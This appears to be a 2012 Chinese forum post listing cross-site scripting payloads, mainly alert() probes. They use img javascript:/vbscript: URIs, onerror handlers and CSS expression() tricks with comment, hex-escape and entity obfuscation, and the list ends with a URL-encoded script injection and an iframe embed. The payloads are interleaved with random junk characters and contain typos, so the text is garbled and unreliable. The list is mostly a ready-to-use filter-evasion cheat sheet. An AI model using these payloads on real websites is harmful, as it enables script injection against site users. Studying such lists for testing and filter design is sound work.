<script>alert("跨站")</script> (最常用)
$ @4 g: Y* I5 U<img scr=javascript:alert("跨站")></img>
$ l3 l3 `& Y5 Y, U) n<img scr="javascript: alert(/跨站/)></img>! P0 t( b W) @: U1 _9 R- u
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
( u9 z# v0 t. ]7 _<img scr="#" onerror=alert(/跨站/)></img>4 O$ T/ D% v9 ~; n% O3 }
<img scr="#" style="xss:expression(alert(/xss/));"></img>
5 J% w5 a: V6 M" {<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)! c; I/ u% E* L, j7 H3 ]5 ]
<img src=vbscript:msgbox ("xss")></img>) r- G3 m& z" Y+ J- }8 I
<style> input {left:expression (alert('xss'))}</style>0 H/ C' w: u4 [ d& J
<div style={left:expression (alert('xss'))}></div>
! m. q; c% [8 [2 }$ n$ ]' B2 o, g<div style={left:exp/* */ression (alert('xss'))}></div>
4 M+ @' g8 U* s, m<div style={left:\0065\0078ression (alert('xss'))}></div>4 V l7 a8 m0 a7 ^3 G
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>3 w8 e6 i" g4 W- B
unicode <div style="{left:expRessioN (alert('xss'))}">6 x- `( O' g3 q5 N
z9 J3 x4 E: f
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
6 V# a# A `5 b |
发表于 2012-9-13 17:15:04
收藏
支持
反对